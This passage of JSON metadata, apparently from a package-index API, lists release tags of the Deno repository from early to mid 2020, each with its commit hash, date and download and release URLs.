.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependenc